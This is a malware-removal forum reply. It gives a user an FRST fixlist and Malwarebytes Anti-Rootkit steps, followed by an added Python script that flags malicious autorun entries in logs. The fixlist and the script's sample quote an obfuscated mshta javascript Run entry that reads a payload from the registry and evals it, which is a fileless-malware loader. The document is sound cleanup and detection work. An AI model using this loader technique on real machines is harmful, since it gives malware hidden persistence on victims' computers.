Hi, you will need to uninstall AVG and then run the removal tool: https://support.avg.com/SupportArticleView?l=en_US&urlname=How-to-uninstall-AVG
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [**66d9dc3c<*>] => mshta javascript:i4hPyNC1P="l8";vG8=new%20ActiveXObject("WScript.Shell");t7gDiPS="tma";j7a7dm=vG8.RegRead("HKLM\\software\\Wow6432Node\\ea6c3e3e\\a6f8fd0b");hHW9sA4nUX="5Rk0pvb";eval(j7a7dm);IJS8ZkBI= (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3046787366-2328371080-4250773792-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO-x32: No Name -> {889D2FEB-5411-4565-8998-1DD2C5261283} -> No File
FF HKLM\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] - C:\Program Files\Updater By SweetPacks\Firefox
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-3046787366-2328371080-4250773792-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tony\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
AlternateDataStreams: C:\Windows\SysWOW64\-STARTTYPE:AUTORUN
AlternateDataStreams: C:\Windows\SysWOW64\CN1AC111KY05RW:NW
C:\Program Files\Updater By SweetPacks
DeleteKey: HKLM\software\Wow6432Node\ea6c3e3e
DeleteKey: HKCU\Software\ea6c3e3e
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe.
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix.
On completion a log will be generated; please post that.
THEN
Please download Malwarebytes AntiRootkit and save it to your desktop.
Full instructions how to use MBAR
Please note: This is a beta version, so please be sure to read the disclaimer and take note of it.
• Unzip/unrar MBAR in a folder to your Desktop and MBAM shall run …
• Click on Next > then on Update button to download fresh definitions.
https://dl.dropboxusercontent.com/u/73555776/mbar_update.JPG
• When the database updates, click Next.
• In the following window ensure the “Targets” scan options Drivers; Sectors; System are ticked. Then select the “Scan” button.
https://dl.dropboxusercontent.com/u/73555776/mbarscan.JPG
• If any infections are found, ensure “Create Restore Point” is checked, then select the “Cleanup” button to remove threats.
Or if you are sure any entries should be kept, just untick them. A list of infected files will be listed.
• The clean-up procedure will be scheduled for processing.
• When complete, a pop-up will show. Select the Yes button and the system should reboot to complete the cleaning process.
Please attach the two following logs from the mbar folder:
system-log.txt
and
mbar-log-year-month-day (hour-minute-second).txt.
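
An added example, not part of the original post: a small Python check that scans FRST-style log text for Run entries like the first line of the fixlist above (mshta launched with an inline javascript: URL that reads a registry value and evals it) and reports the registry key holding the payload, which is the key the DeleteKey: directive removes. The sample log, the function name and the two benign entries are constructed for illustration.

```python
import re

# Constructed sample in FRST log style. The first entry is abridged from the
# fixlist above; the other two are made-up benign entries for contrast.
SAMPLE_LOG = r'''
HKLM-x32\...\Run: [**66d9dc3c<*>] => mshta javascript:i4hPyNC1P="l8";vG8=new%20ActiveXObject("WScript.Shell");j7a7dm=vG8.RegRead("HKLM\\software\\Wow6432Node\\ea6c3e3e\\a6f8fd0b");eval(j7a7dm); <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe /background
HKU\S-1-5-21-0-0-0-1000\...\Run: [ExampleHelp] => mshta.exe C:\Tools\help.hta
'''

# "<hive>\...\Run: [<value name>] => <command line>"
RUN_LINE = re.compile(
    r'^(?P<hive>HK\S+?)\\\.\.\.\\(?P<key>Run(?:Once)?): \[(?P<name>.*?)\] => (?P<data>.*)$')
# mshta given script text directly instead of a path to an .hta file
INLINE_SCRIPT = re.compile(r'\bmshta(?:\.exe)?\s+"?(?:javascript|vbscript):', re.I)
# Registry path that the inline script reads its second stage from
REG_READ = re.compile(r'RegRead\(\s*"([^"]+)"\s*\)', re.I)


def find_script_autoruns(log_text):
    """Return one finding per Run entry that starts mshta with inline script."""
    findings = []
    for line in log_text.splitlines():
        m = RUN_LINE.match(line.strip())
        if not m or not INLINE_SCRIPT.search(m['data']):
            continue
        data = m['data']
        # The script escapes backslashes (\\); undo that to get real registry paths.
        refs = [p.replace('\\\\', '\\') for p in REG_READ.findall(data)]
        findings.append({
            'autorun': f"{m['hive']}\\...\\{m['key']}",
            'value_name': m['name'],
            'evals_payload': 'eval(' in data,
            # Parent key of each value read: the key that also has to be removed.
            'payload_keys': [p.rsplit('\\', 1)[0] for p in refs],
        })
    return findings


if __name__ == '__main__':
    for finding in find_script_autoruns(SAMPLE_LOG):
        print(finding)
```

Only the first sample entry is reported; mshta pointed at an .hta file on disk is not matched by this check.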